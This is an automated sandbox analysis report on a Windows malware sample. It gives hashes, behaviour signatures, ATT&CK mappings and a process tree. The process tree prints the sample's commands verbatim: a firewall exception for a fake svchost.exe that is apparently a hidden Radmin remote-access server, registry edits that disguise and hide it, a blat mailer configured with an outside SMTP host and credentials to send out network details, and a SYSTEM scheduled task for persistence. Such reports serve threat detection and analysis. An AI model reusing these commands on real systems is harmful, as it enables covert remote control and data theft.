Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
09/03/2024, 19:20
Static task
static1
Behavioral task
behavioral1
Sample
03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612.exe
Resource
win10v2004-20240226-en
General
-
Target
03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612.exe
-
Size
392KB
-
MD5
1839f51ab6ca69146fc987a3d8748f0a
-
SHA1
cb0de654492fc306aaf40a23e4bdb19b3fbb7f1e
-
SHA256
03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612
-
SHA512
d6b70197615f2523c941a89bdf59b0eb11adf0eb716661414282b2cce81f057d07466e618f1fbc8bf629f787e36d1821143813c1eadffca036f68858ea7f08ba
-
SSDEEP
12288:401XB3fTg2RV36C3GwBkzZjwFu6mY3gOfgSN:401XB3fx361Ukd8zN3gsv
Malware Config
Signatures
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3680 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation 03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612.exe -
Executes dropped EXE 6 IoCs
pid Process 2040 cmdow.exe 2436 svchost.exe 3564 svchost.exe 3444 svchost.exe 1808 blat.exe 1804 blat.exe -
Loads dropped DLL 3 IoCs
pid Process 2436 svchost.exe 3564 svchost.exe 3444 svchost.exe -
Drops file in System32 directory 7 IoCs
description ioc Process File created C:\Windows\SysWOW64\blat.exe cmd.exe File opened for modification C:\Windows\SysWOW64\blat.exe cmd.exe File created C:\Windows\SysWOW64\blat.lib cmd.exe File opened for modification C:\Windows\SysWOW64\blat.lib cmd.exe File created C:\Windows\SysWOW64\blat.dll cmd.exe File opened for modification C:\Windows\SysWOW64\blat.dll cmd.exe File created C:\Windows\SysWOW64\ip.txt cmd.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\admdll.dll cmd.exe File created C:\Windows\svchost.exe cmd.exe File opened for modification C:\Windows\svchost.exe cmd.exe File created C:\Windows\raddrv.dll cmd.exe File opened for modification C:\Windows\raddrv.dll cmd.exe File created C:\Windows\admdll.dll cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3020 1804 WerFault.exe 103 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1380 schtasks.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 4956 ipconfig.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 1680 reg.exe 4792 reg.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2040 cmdow.exe 2040 cmdow.exe 2040 cmdow.exe 2040 cmdow.exe 2040 cmdow.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 4800 wrote to memory of 1124 4800 03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612.exe 89 PID 4800 wrote to memory of 1124 4800 03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612.exe 89 PID 4800 wrote to memory of 1124 4800 03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612.exe 89 PID 1124 wrote to memory of 2040 1124 cmd.exe 92 PID 1124 wrote to memory of 2040 1124 cmd.exe 92 PID 1124 wrote to memory of 2040 1124 cmd.exe 92 PID 1124 wrote to memory of 3680 1124 cmd.exe 95 PID 1124 wrote to memory of 3680 1124 cmd.exe 95 PID 1124 wrote to memory of 3680 1124 cmd.exe 95 PID 1124 wrote to memory of 4792 1124 cmd.exe 96 PID 1124 wrote to memory of 4792 1124 cmd.exe 96 PID 1124 wrote to memory of 4792 1124 cmd.exe 96 PID 1124 wrote to memory of 1680 1124 cmd.exe 97 PID 1124 wrote to memory of 1680 1124 cmd.exe 97 PID 1124 wrote to memory of 1680 1124 cmd.exe 97 PID 1124 wrote to memory of 2436 1124 cmd.exe 98 PID 1124 wrote to memory of 2436 1124 cmd.exe 98 PID 1124 wrote to memory of 2436 1124 cmd.exe 98 PID 1124 wrote to memory of 3564 1124 cmd.exe 99 PID 1124 wrote to memory of 3564 1124 cmd.exe 99 PID 1124 wrote to memory of 3564 1124 cmd.exe 99 PID 1124 wrote to memory of 1808 1124 cmd.exe 101 PID 1124 wrote to memory of 1808 1124 cmd.exe 101 PID 1124 wrote to memory of 1808 1124 cmd.exe 101 PID 1124 wrote to memory of 4956 1124 cmd.exe 102 PID 1124 wrote to memory of 4956 1124 cmd.exe 102 PID 1124 wrote to memory of 4956 1124 cmd.exe 102 PID 1124 wrote to memory of 1804 1124 cmd.exe 103 PID 1124 wrote to memory of 1804 1124 cmd.exe 103 PID 1124 wrote to memory of 1804 1124 cmd.exe 103 PID 1124 wrote to memory of 1380 1124 cmd.exe 118 PID 1124 wrote to memory of 1380 1124 cmd.exe 118 PID 1124 wrote to memory of 1380 1124 cmd.exe 118
Processes
-
C:\Users\Admin\AppData\Local\Temp\03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612.exe"C:\Users\Admin\AppData\Local\Temp\03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\install.bat" "2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\cmdow.execmdow @ /HID3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2040
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\svchost.exe" "Remote Administrator Server" ENABLE3⤵
- Modifies Windows Firewall
PID:3680
-
-
C:\Windows\SysWOW64\reg.exeREG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f3⤵
- Modifies registry key
PID:4792
-
-
C:\Windows\SysWOW64\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f3⤵
- Modifies registry key
PID:1680
-
-
C:\Windows\svchost.exe"C:\Windows/svchost.exe" /install /silence3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2436
-
-
C:\Windows\svchost.exe"C:\Windows/svchost.exe" /start3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3564
-
-
C:\Windows\SysWOW64\blat.exeC:\Windows/system32/blat.exe -install -server smtp.bk.ru -port 25 -f [email protected] -u 3xxx92 -pw 4745683171597533⤵
- Executes dropped EXE
PID:1808
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all3⤵
- Gathers network information
PID:4956
-
-
C:\blat.exePID:1804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1804 -s 5884⤵
- Program crash
PID:3020
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr C:\Windows/system32\ip.bat3⤵
- Creates scheduled task(s)
PID:1380
-
-
-
C:\Windows\svchost.exe"C:\Windows\svchost.exe" /service1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1804 -ip 18041⤵PID:2436
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1023B
MD595410e55584ab8aadd46040596952978
SHA1fd2108b1755a41f5229614ca72c9733b20fd9d53
SHA2561fbc098eb2f64e7cb848e6311c4cd04e5f5c3ee21f7968f6c1832aeda632044b
SHA51273655c0b9a36c3e2787a1dc54be999a15414d51c8a72e316c67a41bb2ff93c300fcb525049915d8af7946b115050095c9166ced91f08d72edf984ded6a7698cd
-
Filesize
88KB
MD5c915181e93fe3d4c41b1963180d3c535
SHA1f35e66bec967d4254338a120eea8159f29c06a99
SHA256d8fc5d545e684a4d5001004463f762d190bee478eb3a329f65998bad53d3c958
SHA5122a5ceeb919546a713e172823da75e8f58c98c1dcedfaa7cacbd48af57bcb8da49c6289908c6c2a1bb6bda4cc7fac58adffae4a500dfe0c503397ca9aa8e92e21
-
Filesize
120KB
MD5724cae63522f6e5f7565a3bf4b2a719b
SHA118620dbd4357d85918070f669ff4b61755290757
SHA256b87814eaf1cd5268e797f1119b58e3fd79381af3f530be9a90993198cbce1779
SHA512af68749cadf9920a8bed455a2557b1faf475d30fdd62f45da6757fbc5a59341fffeccca4ff646b334da95cf673deeeea74bdbb27a16f510a4e3309055f89817d
-
Filesize
112KB
MD531f84e433e8d1865e322998a41e6d90e
SHA1cbea6cda10db869636f57b1cffad39b22e6f7f17
SHA256aeca4a77d617da84296b5f857b2821333fe4b9663e8df74ef5a25a7882693e5e
SHA5127ae504723b5b140e45af3163d1bfdc5ee0497debafba07cfbf1d2c15147c000be53f4ac8d36d926ed11cf0bb62e9e72f9bcf5d4caf92aa732d942f55834e2be9
-
Filesize
2KB
MD53cd3cffda2b5108e2778f94429c624d6
SHA13e4d218d1b8eb4fa1ab5152b126951892aff3dc9
SHA256b545194041588fc0a6f57e7eb5a93d2418aaa263d246e3c696a79ee5859770ff
SHA512c80080afcc982c4e950876756fb32c7f24fbe45bfbbe78afe144be1ede86dc9ef1e57db95d3df7f4c6011fd226f23684b929781b55d1be659cfa75d14f8d0c79
-
Filesize
28KB
MD5b50d22ab0323cbd0fedfdf4689bc1301
SHA1efd6ef059fa6ef25791e7ee660d63b05d0c11963
SHA256970786caf18ef731b0e1a562e7155c7b7fe525fc000c14a6156ac19292922bc0
SHA51291961bd7fe9744f56a1dde2123d78db428f3d7c1dd0155458a73e822f3073d5221e95cc4441d824b36b556765660ae781282c3c4d95e3a810abf4ff84c0c5bfc
-
Filesize
180KB
MD54da2155a683838f6d2ff544437fb76c8
SHA145c08891e4f811c3eee4d84474d7ca230b12f4ec
SHA2560425a758ee783e178f0e3259cd07f7ba41f6fcca1146631636613d247809345b
SHA51251228f948e8a2e94f8c8b6bf243557f4430003d72a6ae2388b34b60d904e257bab8e7287cc053d86f01e0011994f9007170d227d274f9d0aac6326a1643af54e
-
Filesize
30KB
MD548a78bf8ef453d9ca4d6c0587ae2de94
SHA1fdcc71edb09d13165abb106dec95b5376cc05527
SHA256319390597ae00859d5862aec261584cdb8e6c863c06ac69fecbe374165491756
SHA512d30ff0df216637f1361fd76a0b18fbfc95f8917e04c2feef504edf57a2056d988d096a1de6189462971cbd718b61bcb7874860a38fd54bebf2970e90b37db11d
-
Filesize
1KB
MD5b326302bbf521a1f38add9e94ca8ffb6
SHA19f810c52fe5aba139480a89ccf1ced4cbd6eddc8
SHA2567319d41bd0ac2c5912dab2f63fb8c24c8cc2c19e94fe479a546682f606496832
SHA5121050db5a16689357b9dd5d4bd6a8d0f281da5dab4f1c79e956df1390487abe5412f1cea00c1c0bd2b7d3e68850bf4d31db749ff8ef29757efdfa2e35706b134c